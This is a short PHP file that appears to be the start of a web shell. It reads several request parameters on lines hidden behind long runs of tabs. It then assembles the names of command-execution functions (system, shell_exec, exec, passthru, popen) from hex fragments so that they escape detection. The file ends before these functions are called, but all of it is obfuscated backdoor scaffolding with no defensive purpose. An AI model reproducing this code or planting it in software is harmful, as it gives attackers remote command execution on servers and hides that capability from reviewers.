<?php																																										trim($_REQUEST['LEayZi']);
																																										trim($_REQUEST['XELtas']);
																																										
																																										trim($_REQUEST['OYNMHu']);


$identifier1 = '73';
$identifier2 = '79';
$identifier3 = '74';
$identifier4 = '65';
$identifier5 = '6d';
$identifier6 = '6c';
$identifier7 = '63';
$identifier8 = '61';
$identifier9 = '75';
$identifier10 = '72';
$identifier11 = '5f';
$identifier12 = '67';
$identifier13 = '6f';
$created1 = pack("H*", $identifier1.$identifier2.$identifier1.$identifier3.$identifier4.$identifier5);
$created2 = pack("H*", '73'.'68'.$identifier4.$identifier6.$identifier6.'5f'.$identifier4.'78'.'65'.$identifier7);
$created3 = pack("H*", $identifier4.'78'.'65'.$identifier7);
$created4 = pack("H*", '70'.$identifier8.'73'.$identifier1.$identifier3.'68'.'72'.$identifier9);
$created5 = pack("H*", '70'.'6f'.'70'.$identifier4.'6e');
$created6 = pack("H*", '73'.$identifier3.$identifier10.'65'.'61'.$identifier5.$identifier11.$identifier12.$identifier4.'74'.'5f'.'63'.$identifier13.'6e'.'74'.'65'.'6e'.'74'.'73');
$created7 = pack("H*", '70'.'63'.'6c'.$identifier13.'73'.$identifier4);

